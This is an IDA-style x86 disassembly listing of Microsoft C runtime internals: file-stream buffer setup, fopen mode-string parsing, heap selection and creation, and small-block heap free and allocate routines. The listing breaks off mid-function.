; =============== S U B R O U T I N E =======================================
sub_41A8A2 proc near ; CODE XREF: sub_417956+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41FA1C
test eax, eax
pop ecx
jz short loc_41A92B
cmp esi, offset dword_4363A8
jnz short loc_41A8C0
xor eax, eax
jmp short loc_41A8CB
; ---------------------------------------------------------------------------
loc_41A8C0: ; CODE XREF: sub_41A8A2+18�j
cmp esi, offset dword_4363C8
jnz short loc_41A92B
push 1
pop eax
loc_41A8CB: ; CODE XREF: sub_41A8A2+1C�j
inc ds:dword_4CDB78
test word ptr [esi+0Ch], 10Ch
jnz short loc_41A92B
cmp ds:dword_4CDA0C[eax*4], 0
push ebx
push edi
lea edi, ds:4CDA0Ch[eax*4]
mov ebx, 1000h
jnz short loc_41A911
push ebx
call sub_417B89
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41A911
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41A91E
; ---------------------------------------------------------------------------
loc_41A911: ; CODE XREF: sub_41A8A2+4D�j
; sub_41A8A2+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_41A91E: ; CODE XREF: sub_41A8A2+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A92B: ; CODE XREF: sub_41A8A2+10�j
; sub_41A8A2+24�j ...
xor eax, eax
pop esi
retn
sub_41A8A2 endp
; =============== S U B R O U T I N E =======================================
sub_41A92F proc near ; CODE XREF: sub_417956+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_41A959
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41A96A
push esi
call sub_41A7D0
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A959: ; CODE XREF: sub_41A92F+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_41A96A
push eax
call sub_41A7D0
pop ecx
loc_41A96A: ; CODE XREF: sub_41A92F+10�j
; sub_41A92F+32�j
pop esi
retn
sub_41A92F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A96C proc near ; CODE XREF: sub_417988+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:dword_4CDB80
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_41A9A5
cmp al, 72h
jz short loc_41A99E
cmp al, 77h
jnz loc_41AAB9
mov ecx, 301h
jmp short loc_41A9AA
; ---------------------------------------------------------------------------
loc_41A99E: ; CODE XREF: sub_41A96C+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41A9AD
; ---------------------------------------------------------------------------
loc_41A9A5: ; CODE XREF: sub_41A96C+1D�j
mov ecx, 109h
loc_41A9AA: ; CODE XREF: sub_41A96C+30�j
or esi, 2
loc_41A9AD: ; CODE XREF: sub_41A96C+37�j
push 1
pop edx
loc_41A9B0: ; CODE XREF: sub_41A96C+8B�j
; sub_41A96C+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_41AA9F
cmp edx, ebx
jz loc_41AA9F
movsx eax, al
cmp eax, 54h
jg short loc_41AA3E
jz short loc_41AA2E
sub eax, 2Bh
jz short loc_41AA18
sub eax, 19h
jz short loc_41AA0E
sub eax, 0Eh
jz short loc_41A9F9
dec eax
jnz loc_41AA90
cmp [ebp+var_4], ebx
jnz loc_41AA90
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41A9F9: ; CODE XREF: sub_41A96C+6F�j
cmp [ebp+var_4], ebx
jnz loc_41AA90
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA0E: ; CODE XREF: sub_41A96C+6A�j
test cl, 40h
jnz short loc_41AA90
or ecx, 40h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA18: ; CODE XREF: sub_41A96C+65�j
test cl, 2
jnz short loc_41AA90
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA2E: ; CODE XREF: sub_41A96C+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_41AA90
or ecx, eax
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA3E: ; CODE XREF: sub_41A96C+5E�j
sub eax, 62h
jz short loc_41AA8B
dec eax
jz short loc_41AA74
sub eax, 0Bh
jz short loc_41AA5D
sub eax, 6
jnz short loc_41AA90
test ch, 0C0h
jnz short loc_41AA90
or ch, 40h
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA5D: ; CODE XREF: sub_41A96C+DD�j
cmp [ebp+var_8], ebx
jnz short loc_41AA90
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA74: ; CODE XREF: sub_41A96C+D8�j
cmp [ebp+var_8], ebx
jnz short loc_41AA90
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA8B: ; CODE XREF: sub_41A96C+D5�j
test ch, 0C0h
jz short loc_41AA97
loc_41AA90: ; CODE XREF: sub_41A96C+72�j
; sub_41A96C+7B�j ...
xor edx, edx
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA97: ; CODE XREF: sub_41A96C+122�j
or ch, 80h
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA9F: ; CODE XREF: sub_41A96C+4A�j
; sub_41A96C+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41FEC6
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41AABD
loc_41AAB9: ; CODE XREF: sub_41A96C+25�j
xor eax, eax
jmp short loc_41AAD7
; ---------------------------------------------------------------------------
loc_41AABD: ; CODE XREF: sub_41A96C+14B�j
mov eax, [ebp+arg_C]
inc ds:dword_4CDB78
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41AAD7: ; CODE XREF: sub_41A96C+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A96C endp
; =============== S U B R O U T I N E =======================================
sub_41AADC proc near ; CODE XREF: sub_417988�p
mov edx, ds:dword_4CECC0
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41AB4D
mov ebx, ds:dword_4CDCB0
mov edi, ebx
loc_41AAF8: ; CODE XREF: sub_41AADC+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_41AB13
test byte ptr [ecx+0Ch], 83h
jz short loc_41AB0E
inc eax
add edi, 4
cmp eax, edx
jl short loc_41AAF8
jmp short loc_41AB4D
; ---------------------------------------------------------------------------
loc_41AB0E: ; CODE XREF: sub_41AADC+26�j
mov esi, [ebx+eax*4]
jmp short loc_41AB37
; ---------------------------------------------------------------------------
loc_41AB13: ; CODE XREF: sub_41AADC+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_417B89
pop ecx
mov ecx, ds:dword_4CDCB0
mov [edi+ecx], eax
mov eax, ds:dword_4CDCB0
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41AB4D
mov esi, edi
loc_41AB37: ; CODE XREF: sub_41AADC+35�j
cmp esi, ebp
jz short loc_41AB4D
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41AB4D: ; CODE XREF: sub_41AADC+12�j
; sub_41AADC+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41AADC endp
; =============== S U B R O U T I N E =======================================
sub_41AB54 proc near ; CODE XREF: sub_417B9B+1F�p
; sub_41944F+126�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4CDA18
test eax, eax
jz short loc_41AB6C
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41AB6C
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41AB6C: ; CODE XREF: sub_41AB54+7�j
; sub_41AB54+12�j
xor eax, eax
retn
sub_41AB54 endp
; =============== S U B R O U T I N E =======================================
sub_41AB6F proc near ; CODE XREF: sub_41AB9C+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call ds:off_424100
cmp word ptr [eax], 5A4Dh
jnz short loc_41AB9A
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_41AB9A
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_41AB9A: ; CODE XREF: sub_41AB6F+15�j
; sub_41AB6F+1C�j
pop esi
retn
sub_41AB6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB9C proc near ; CODE XREF: sub_41ACE4+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_417B30
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call ds:dword_424144 ;; GetVersionExA
test eax, eax
jz short loc_41ABDF
cmp [ebp+var_88], 2
jnz short loc_41ABDF
cmp [ebp+var_94], 5
jb short loc_41ABDF
push 1
pop eax
jmp loc_41ACE1
; ---------------------------------------------------------------------------
loc_41ABDF: ; CODE XREF: sub_41AB9C+27�j
; sub_41AB9C+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_4241A4 ;; GetEnvironmentVariableA
test eax, eax
jz loc_41ACCE
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_41AC21
loc_41AC0E: ; CODE XREF: sub_41AB9C+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_41AC1C
cmp al, 7Ah
jg short loc_41AC1C
sub al, 20h
mov [ecx], al
loc_41AC1C: ; CODE XREF: sub_41AB9C+76�j
; sub_41AB9C+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_41AC0E
loc_41AC21: ; CODE XREF: sub_41AB9C+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_418DA0
add esp, 0Ch
test eax, eax
jnz short loc_41AC43
lea eax, [ebp+var_122C]
jmp short loc_41AC8C
; ---------------------------------------------------------------------------
loc_41AC43: ; CODE XREF: sub_41AB9C+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call ds:off_424094
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_41AC77
loc_41AC64: ; CODE XREF: sub_41AB9C+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_41AC72
cmp al, 7Ah
jg short loc_41AC72
sub al, 20h
mov [ecx], al
loc_41AC72: ; CODE XREF: sub_41AB9C+CC�j
; sub_41AB9C+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_41AC64
loc_41AC77: ; CODE XREF: sub_41AB9C+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_417880
pop ecx
pop ecx
loc_41AC8C: ; CODE XREF: sub_41AB9C+A5�j
cmp eax, ebx
jz short loc_41ACCE
push 2Ch
push eax
call sub_418F50
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41ACCE
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_41ACB3
loc_41ACA5: ; CODE XREF: sub_41AB9C+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_41ACAE
mov [ecx], bl
jmp short loc_41ACAF
; ---------------------------------------------------------------------------
loc_41ACAE: ; CODE XREF: sub_41AB9C+10C�j
inc ecx
loc_41ACAF: ; CODE XREF: sub_41AB9C+110�j
cmp [ecx], bl
jnz short loc_41ACA5
loc_41ACB3: ; CODE XREF: sub_41AB9C+107�j
push 0Ah
push ebx
push eax
call sub_41881C
add esp, 0Ch
cmp eax, 2
jz short loc_41ACE1
cmp eax, 3
jz short loc_41ACE1
cmp eax, 1
jz short loc_41ACE1
loc_41ACCE: ; CODE XREF: sub_41AB9C+5C�j
; sub_41AB9C+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_41AB6F
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_41ACE1: ; CODE XREF: sub_41AB9C+3E�j
; sub_41AB9C+126�j ...
pop ebx
leave
retn
sub_41AB9C endp
; =============== S U B R O U T I N E =======================================
sub_41ACE4 proc near ; CODE XREF: _0:00419C3E�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_4241AC ;; HeapCreate
test eax, eax
mov ds:dword_4CF024, eax
jz short loc_41AD3A
call sub_41AB9C
cmp eax, 3
mov ds:dword_4CF028, eax
jnz short loc_41AD20
push 3F8h
call sub_41AD41
pop ecx
jmp short loc_41AD2A
; ---------------------------------------------------------------------------
loc_41AD20: ; CODE XREF: sub_41ACE4+2D�j
cmp eax, 2
jnz short loc_41AD3D
call sub_41B888
loc_41AD2A: ; CODE XREF: sub_41ACE4+3A�j
test eax, eax
jnz short loc_41AD3D
push ds:dword_4CF024
call ds:dword_4241A8 ;; HeapDestroy
loc_41AD3A: ; CODE XREF: sub_41ACE4+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41AD3D: ; CODE XREF: sub_41ACE4+3F�j
; sub_41ACE4+48�j
push 1
pop eax
retn
sub_41ACE4 endp
; =============== S U B R O U T I N E =======================================
sub_41AD41 proc near ; CODE XREF: sub_41ACE4+34�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_4CF024
call ds:dword_4240E8 ;; RtlAllocateHeap
test eax, eax
mov ds:dword_4CF01C, eax
jnz short loc_41AD5E
retn
; ---------------------------------------------------------------------------
loc_41AD5E: ; CODE XREF: sub_41AD41+1A�j
mov ecx, [esp+arg_0]
and ds:dword_4CF014, 0
and ds:dword_4CF018, 0
push 1
mov ds:dword_4CF010, eax
mov ds:dword_4CF020, ecx
mov ds:dword_4CF008, 10h
pop eax
retn
sub_41AD41 endp
; =============== S U B R O U T I N E =======================================
sub_41AD89 proc near ; CODE XREF: sub_417C3B+17�p
; sub_41944F+4C�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4CF018
lea ecx, [eax+eax*4]
mov eax, ds:dword_4CF01C
lea ecx, [eax+ecx*4]
loc_41AD99: ; CODE XREF: sub_41AD89+26�j
cmp eax, ecx
jnb short loc_41ADB1
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41ADB3
add eax, 14h
jmp short loc_41AD99
; ---------------------------------------------------------------------------
loc_41ADB1: ; CODE XREF: sub_41AD89+12�j
xor eax, eax
locret_41ADB3: ; CODE XREF: sub_41AD89+21�j
retn
sub_41AD89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADB4 proc near ; CODE XREF: sub_417C3B+23�p
; sub_41944F+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41B0D8
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41AE8A
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41AE18
push 3Fh
pop edx
loc_41AE18: ; CODE XREF: sub_41ADB4+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41AE6C
cmp edx, 20h
jnb short loc_41AE43
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41AE64
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41AE64
; ---------------------------------------------------------------------------
loc_41AE43: ; CODE XREF: sub_41ADB4+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41AE64
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41AE64: ; CODE XREF: sub_41ADB4+86�j
; sub_41ADB4+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_41AE6F
; ---------------------------------------------------------------------------
loc_41AE6C: ; CODE XREF: sub_41ADB4+6A�j
mov ecx, [ebp+var_4]
loc_41AE6F: ; CODE XREF: sub_41ADB4+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_41AE8A: ; CODE XREF: sub_41ADB4+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41AE98
push 3Fh
pop edx
loc_41AE98: ; CODE XREF: sub_41ADB4+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41AF3B
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41AEBD
mov ebx, esi
loc_41AEBD: ; CODE XREF: sub_41ADB4+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_41AECF
mov edx, esi
loc_41AECF: ; CODE XREF: sub_41ADB4+117�j
cmp ebx, edx
jz short loc_41AF36
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41AF1E
cmp ebx, 20h
jnb short loc_41AEFF
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41AF1E
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41AF1E
; ---------------------------------------------------------------------------
loc_41AEFF: ; CODE XREF: sub_41ADB4+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41AF1E
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41AF1E: ; CODE XREF: sub_41ADB4+128�j
; sub_41ADB4+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41AF36: ; CODE XREF: sub_41ADB4+11D�j
mov esi, [ebp+arg_4]
jmp short loc_41AF3E
; ---------------------------------------------------------------------------
loc_41AF3B: ; CODE XREF: sub_41ADB4+ED�j
mov ebx, [ebp+arg_0]
loc_41AF3E: ; CODE XREF: sub_41ADB4+185�j
cmp [ebp+var_C], 0
jnz short loc_41AF4C
cmp ebx, edx
jz loc_41AFCD
loc_41AF4C: ; CODE XREF: sub_41ADB4+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41AFCD
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_41AFA4
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41AF93
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41AF93: ; CODE XREF: sub_41ADB4+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41AFCD
; ---------------------------------------------------------------------------
loc_41AFA4: ; CODE XREF: sub_41ADB4+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41AFBA
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41AFBA: ; CODE XREF: sub_41ADB4+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41AFCD: ; CODE XREF: sub_41ADB4+192�j
; sub_41ADB4+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41B0D8
mov eax, ds:dword_4CF014
test eax, eax
jz loc_41B0CA
mov ecx, ds:dword_4CF00C
mov esi, ds:dword_4241B0
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, ds:dword_4CF00C
mov eax, ds:dword_4CF014
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_4CF014
mov ecx, ds:dword_4CF00C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_4CF014
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_4CF014
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41B05B
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_4CF014
loc_41B05B: ; CODE XREF: sub_41ADB4+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41B0CA
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, ds:dword_4CF014
push dword ptr [eax+10h]
push 0
push ds:dword_4CF024
call ds:dword_4240E4 ;; RtlFreeHeap
mov eax, ds:dword_4CF018
mov edx, ds:dword_4CF01C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_4CF014
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_4182C0
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_4CF018
cmp eax, ds:dword_4CF014
jbe short loc_41B0C0
sub [ebp+arg_0], 14h
loc_41B0C0: ; CODE XREF: sub_41ADB4+306�j
mov eax, ds:dword_4CF01C
mov ds:dword_4CF010, eax
loc_41B0CA: ; CODE XREF: sub_41ADB4+234�j
; sub_41ADB4+2AB�j
mov eax, [ebp+arg_0]
mov ds:dword_4CF00C, edi
mov ds:dword_4CF014, eax
loc_41B0D8: ; CODE XREF: sub_41ADB4+38�j
; sub_41ADB4+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_41ADB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0DD proc near ; CODE XREF: sub_417BC7+18�p
; sub_41944F+77�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4CF018
mov edx, ds:dword_4CF01C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_41B11D
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41B12D
; ---------------------------------------------------------------------------
loc_41B11D: ; CODE XREF: sub_41B0DD+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_41B12D: ; CODE XREF: sub_41B0DD+3E�j
mov eax, ds:dword_4CF010
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_41B154
loc_41B13B: ; CODE XREF: sub_41B0DD+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B154
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41B13B
loc_41B154: ; CODE XREF: sub_41B0DD+5C�j
; sub_41B0DD+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_41B1D2
mov ebx, edx
loc_41B15B: ; CODE XREF: sub_41B0DD+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41B177
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B175
add ebx, 14h
jmp short loc_41B15B
; ---------------------------------------------------------------------------
loc_41B175: ; CODE XREF: sub_41B0DD+91�j
cmp ebx, eax
loc_41B177: ; CODE XREF: sub_41B0DD+83�j
jnz short loc_41B1D2
loc_41B179: ; CODE XREF: sub_41B0DD+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_41B18F
cmp dword ptr [ebx+8], 0
jnz short loc_41B18C
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_41B179
; ---------------------------------------------------------------------------
loc_41B18C: ; CODE XREF: sub_41B0DD+A5�j
cmp ebx, [ebp+var_4]
loc_41B18F: ; CODE XREF: sub_41B0DD+9F�j
jnz short loc_41B1B7
mov ebx, edx
loc_41B193: ; CODE XREF: sub_41B0DD+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41B1A7
cmp dword ptr [ebx+8], 0
jnz short loc_41B1A5
add ebx, 14h
jmp short loc_41B193
; ---------------------------------------------------------------------------
loc_41B1A5: ; CODE XREF: sub_41B0DD+C1�j
cmp ebx, eax
loc_41B1A7: ; CODE XREF: sub_41B0DD+BB�j
jnz short loc_41B1B7
call sub_41B3E6
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41B1CB
loc_41B1B7: ; CODE XREF: sub_41B0DD:loc_41B18F�j
; sub_41B0DD:loc_41B1A7�j
push ebx
call sub_41B497
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41B1D2
loc_41B1CB: ; CODE XREF: sub_41B0DD+D8�j
xor eax, eax
jmp loc_41B3E1
; ---------------------------------------------------------------------------
loc_41B1D2: ; CODE XREF: sub_41B0DD+7A�j
; sub_41B0DD:loc_41B177�j ...
mov ds:dword_4CF010, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41B1F9
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B230
loc_41B1F9: ; CODE XREF: sub_41B0DD+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41B22D
loc_41B216: ; CODE XREF: sub_41B0DD+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_41B216
loc_41B22D: ; CODE XREF: sub_41B0DD+137�j
mov edx, [ebp+var_4]
loc_41B230: ; CODE XREF: sub_41B0DD+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_41B259
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_41B259: ; CODE XREF: sub_41B0DD+16D�j
; sub_41B0DD+183�j
test ecx, ecx
